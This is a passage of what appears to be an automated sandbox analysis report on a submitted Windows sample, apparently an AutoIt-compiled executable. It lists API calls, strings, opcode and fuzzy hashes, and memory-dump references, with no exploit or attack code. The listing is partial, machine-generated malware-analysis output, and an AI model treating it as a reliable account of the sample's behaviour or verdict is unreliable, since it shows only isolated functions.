                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: 29d86d9ad2a8373712d796c51c7e79762ab70c4eda716d43fb41c9375e0659d4
                                                            • Instruction ID: fbba6d071da8879a5cf30f2820e7427e1db5af60c82b643d2cf69b441f1d2c36
                                                            • Opcode Fuzzy Hash: 29d86d9ad2a8373712d796c51c7e79762ab70c4eda716d43fb41c9375e0659d4
                                                            • Instruction Fuzzy Hash: 3DF08236544612EBD7511B68ED4D9EF773AFF55712B108632F603910E0CBBA5901CB54
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 006E899D
                                                            • UnloadUserProfile.USERENV(?,?), ref: 006E89A9
                                                            • CloseHandle.KERNEL32(?), ref: 006E89B2
                                                            • CloseHandle.KERNEL32(?), ref: 006E89BA
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 006E89C3
                                                            • HeapFree.KERNEL32(00000000), ref: 006E89CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: e8abda6adec859afff0b14cd45038d73d96607f42ac2a6042144b2a3a650fa60
                                                            • Instruction ID: ce77af4089731de237d61aec11c390d9b3a285fa87f90ba35f5c7d2c199b7464
                                                            • Opcode Fuzzy Hash: e8abda6adec859afff0b14cd45038d73d96607f42ac2a6042144b2a3a650fa60
                                                            • Instruction Fuzzy Hash: D0E0C236104405FBDA011FE9EC0C98ABF79FB89322B50C230F229810B0CB3A9820EB58
                                                            APIs
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00722C7C,?), ref: 006E76EA
                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00722C7C,?), ref: 006E7702
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,0071FB80,000000FF,?,00000000,00000800,00000000,?,00722C7C,?), ref: 006E7727
                                                            • _memcmp.LIBCMT ref: 006E7748
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: FromProg$FreeTask_memcmp
                                                            • String ID: ,,r
                                                            • API String ID: 314563124-1227627816
                                                            • Opcode ID: a5400aaf95485c3016de9025b4d2096fbfbad3882865c02a0ae394e6bf6dcaf1
                                                            • Instruction ID: 369ba486ee5610b7cba0104a95bfb933bb4444a32291b72f1fb77909e9fe0be8
                                                            • Opcode Fuzzy Hash: a5400aaf95485c3016de9025b4d2096fbfbad3882865c02a0ae394e6bf6dcaf1
                                                            • Instruction Fuzzy Hash: 69811E75A01209EFCF04DFA5C984EEEB7BAFF89315F204558E505AB250DB71AE06CB60
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00708613
                                                            • CharUpperBuffW.USER32(?,?), ref: 00708722
                                                            • VariantClear.OLEAUT32(?), ref: 0070889A
                                                              • Part of subcall function 006F7562: VariantInit.OLEAUT32(00000000), ref: 006F75A2
                                                              • Part of subcall function 006F7562: VariantCopy.OLEAUT32(00000000,?), ref: 006F75AB
                                                              • Part of subcall function 006F7562: VariantClear.OLEAUT32(00000000), ref: 006F75B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            • Opcode ID: 189aac47f911c6b264241173cec376e2d41fa5a9311c60c6b894d8efc817e460
                                                            • Instruction ID: 1e07783689036d0e5cfb37bba53d1f87dc6885e4170c278f6e5098f912cb9363
                                                            • Opcode Fuzzy Hash: 189aac47f911c6b264241173cec376e2d41fa5a9311c60c6b894d8efc817e460
                                                            • Instruction Fuzzy Hash: 4391A270604301DFCB90DF24C48595AB7F9EF89714F148A2EF89A8B3A2DB35E905CB52
                                                            APIs
                                                              • Part of subcall function 006AFC86: _wcscpy.LIBCMT ref: 006AFCA9
                                                            • _memset.LIBCMT ref: 006F2B87
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006F2BB6
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006F2C69
                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 006F2C97
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 4152858687-4108050209
                                                            • Opcode ID: 58bae386f3a26864505ac3e7759bea40ae41ad0ab13ff3b6097b82d2d2cedc7b
                                                            • Instruction ID: 07a50702555ce023683742feb93ef88309d27f18db6e2c67457ed477de5290f2
                                                            • Opcode Fuzzy Hash: 58bae386f3a26864505ac3e7759bea40ae41ad0ab13ff3b6097b82d2d2cedc7b
                                                            • Instruction Fuzzy Hash: 7A51FE7110830A9AD7A49F28C861ABFBBEAEF44310F040A2DFA91D3290DB64CC458F56
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_free
                                                            • String ID: 3cj$_j
                                                            • API String ID: 2620147621-2927472950
                                                            • Opcode ID: f1bcac8dd5596e51e020a5f06897c308e9ede575c9fcb84a4c1c10d67d595aac
                                                            • Instruction ID: 2c41fbd4a5f9660cfb534765d44b36c09b93ce1c8aab2d5f7c3e7f09e54e6729
                                                            • Opcode Fuzzy Hash: f1bcac8dd5596e51e020a5f06897c308e9ede575c9fcb84a4c1c10d67d595aac
                                                            • Instruction Fuzzy Hash: C0513871A083518FDB65DF28C451AAABBE6EF8A310F08492DF98987351DB31ED41CF42
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _memset$_memmove
                                                            • String ID: 3cj$ERCP
                                                            • API String ID: 2532777613-987588500
                                                            • Opcode ID: 76946dbd6511156c856a5fcf3db1629d22fb1541a4f179def994a6318a286177
                                                            • Instruction ID: 45fca35c46b25d70fe836206724e2887dc3d5a95ad41ecfa5b3eb147a9577f89
                                                            • Opcode Fuzzy Hash: 76946dbd6511156c856a5fcf3db1629d22fb1541a4f179def994a6318a286177
                                                            • Instruction Fuzzy Hash: 18519E71A00305DBDB24DF65C8817EABBE6EF05314F24456EE54ACB240E770AA81CF50
                                                            APIs
                                                            • _memset.LIBCMT ref: 006F27C0
                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 006F27DC
                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 006F2822
                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00755890,00000000), ref: 006F286B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem_memset
                                                            • String ID: 0
                                                            • API String ID: 1173514356-4108050209
                                                            • Opcode ID: f97c089507206cf2ca00c65db4d15e984f52ef5fcfea80d370e87526bc9c6d74
                                                            • Instruction ID: 7aad2956d94de607100a14a324bc0ce4c319d1f73f74a1f2b1c01972418bc294
                                                            • Opcode Fuzzy Hash: f97c089507206cf2ca00c65db4d15e984f52ef5fcfea80d370e87526bc9c6d74
                                                            • Instruction Fuzzy Hash: CA41B1702043069FD720DF28C895BAABBEAEF85354F04492DF66597391D730A809CB56
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0070D7C5
                                                              • Part of subcall function 0069784B: _memmove.LIBCMT ref: 00697899
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower_memmove
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 3425801089-567219261
                                                            • Opcode ID: 349e8f94807fe5562628ac15a1998d8fde7dc85ef68425d26887fec644ac9e22
                                                            • Instruction ID: f330de0e5f7b785039b4b47487c3975951d785bc69e8249716343f86e8f33536
                                                            • Opcode Fuzzy Hash: 349e8f94807fe5562628ac15a1998d8fde7dc85ef68425d26887fec644ac9e22
                                                            • Instruction Fuzzy Hash: 8031BE71914219EBDF10EFA4C8519EEB7FAFF00320B108B29E826976D1DB35AD05CB80
                                                            APIs
                                                              • Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22
                                                              • Part of subcall function 006EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006EAABC
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006E8F14
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 006E8F27
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 006E8F57
                                                              • Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_memmove$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 365058703-1403004172
                                                            • Opcode ID: c5114ec409ad975df4ae52baca84a47ab943134894102a35057efcc21f4bda1c
                                                            • Instruction ID: 91b66d023c8ffdf6ac47a2a76f964bd4afbd8c5baf4d141197d8c2226fd48e76
                                                            • Opcode Fuzzy Hash: c5114ec409ad975df4ae52baca84a47ab943134894102a35057efcc21f4bda1c
                                                            • Instruction Fuzzy Hash: F421F071A05208BEEF14ABB5DC86DFFB76ADF05360B04812DF429972E0DB39580AD614
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0070184C
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00701872
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007018A2
                                                            • InternetCloseHandle.WININET(00000000), ref: 007018E9
                                                              • Part of subcall function 00702483: GetLastError.KERNEL32(?,?,00701817,00000000,00000000,00000001), ref: 00702498
                                                              • Part of subcall function 00702483: SetEvent.KERNEL32(?,?,00701817,00000000,00000000,00000001), ref: 007024AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3113390036-3916222277
                                                            • Opcode ID: 637b9181e0fe37fdc470de3d197fce7ea9cec3bc1974f654f79306f0371c5326
                                                            • Instruction ID: 938c35a481622bc1c42d536114d41d573ef77f86c69aa42e196f86592eca438b
                                                            • Opcode Fuzzy Hash: 637b9181e0fe37fdc470de3d197fce7ea9cec3bc1974f654f79306f0371c5326
                                                            • Instruction Fuzzy Hash: 192180B1500308FFEB119F64DC89EBF77EDEB48764F50822AF505962C0DA289E0597A5
                                                            APIs
                                                              • Part of subcall function 00691D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00691D73
                                                              • Part of subcall function 00691D35: GetStockObject.GDI32(00000011), ref: 00691D87
                                                              • Part of subcall function 00691D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00691D91
                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00716461
                                                            • LoadLibraryW.KERNEL32(?), ref: 00716468
                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0071647D
                                                            • DestroyWindow.USER32(?), ref: 00716485
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                            • String ID: SysAnimate32
                                                            • API String ID: 4146253029-1011021900
                                                            • Opcode ID: 2b44dbb6748478b4a73a6785dde267a6668d9f15e9493d9aa58cff51430b9be3
                                                            • Instruction ID: 89194ac57f89edb45c13a82b1910445475b6f5d3f4eb19318b9222eeda32286b
                                                            • Opcode Fuzzy Hash: 2b44dbb6748478b4a73a6785dde267a6668d9f15e9493d9aa58cff51430b9be3
                                                            • Instruction Fuzzy Hash: 38218B71200245ABEF108FA8DC85EFB77ADEB59728F208629FA50920D0D779DC819760
                                                            APIs
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 006F6DBC
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006F6DEF
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 006F6E01
                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 006F6E3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: cd38b4e24218b13ea8507c49778782efdddbc0551f01b4bdb2ea50098db14b39
                                                            • Instruction ID: 02eb1d4ddf2e79c670bdddb591543206557e59a4a52a3c8e2f0063287692575a
                                                            • Opcode Fuzzy Hash: cd38b4e24218b13ea8507c49778782efdddbc0551f01b4bdb2ea50098db14b39
                                                            • Instruction Fuzzy Hash: E821B27560020DABDB209F29DC05AEA77F6FF44720F208619FEA1D73D0D77098109B54
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 006F6E89
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006F6EBB
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 006F6ECC
                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006F6F06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: ee104b3a9f599abfc4407bce4c6a1e23e6ea3c021c9fa92e38c44e127e186939
                                                            • Instruction ID: a3b0d9950a0b9fe5ac92262ad466746219a69dd5ff5f87c530cbc680c8074091
                                                            • Opcode Fuzzy Hash: ee104b3a9f599abfc4407bce4c6a1e23e6ea3c021c9fa92e38c44e127e186939
                                                            • Instruction Fuzzy Hash: 3721B07A60430D9BDB209F69DC04AFA77AAAF55724F204A19FEE0D33D0D770A841CB14
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 006FAC54
                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 006FACA8
                                                            • __swprintf.LIBCMT ref: 006FACC1
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0071F910), ref: 006FACFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu
                                                            • API String ID: 3164766367-685833217
                                                            • Opcode ID: f9986a3342c98339d55377363767fa2c36e097682f9a3070929b4d00f3b11da3
                                                            • Instruction ID: a680481f0bb642f086886a17c0ed8760f23fd8f891c7464dadbe8881d72b61ee
                                                            • Opcode Fuzzy Hash: f9986a3342c98339d55377363767fa2c36e097682f9a3070929b4d00f3b11da3
                                                            • Instruction Fuzzy Hash: 6B216D70A0014DAFCB50EF69C945EEE7BB9EF49714B00806DF909AB252DA31EA41DB25
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006EFCED,?,006F0D40,?,00008000), ref: 006F115F
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,006EFCED,?,006F0D40,?,00008000), ref: 006F1184
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006EFCED,?,006F0D40,?,00008000), ref: 006F118E
                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,006EFCED,?,006F0D40,?,00008000), ref: 006F11C1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID: @o
                                                            • API String ID: 2875609808-3883423318
                                                            • Opcode ID: 3a91f577219b2ab7c452a6a0f28d5903508c5eb1c20ac0abda6c8fd5817b9620
                                                            • Instruction ID: 904161b19df96d407713dbf0ff86c23115a07955e8950d96230d4388170a08c6
                                                            • Opcode Fuzzy Hash: 3a91f577219b2ab7c452a6a0f28d5903508c5eb1c20ac0abda6c8fd5817b9620
                                                            • Instruction Fuzzy Hash: D4111C31D0051DE7CF00DFA5D9446FEBB79FB0A751F008165DB41B6280CB7455519B95
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 006F1B19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
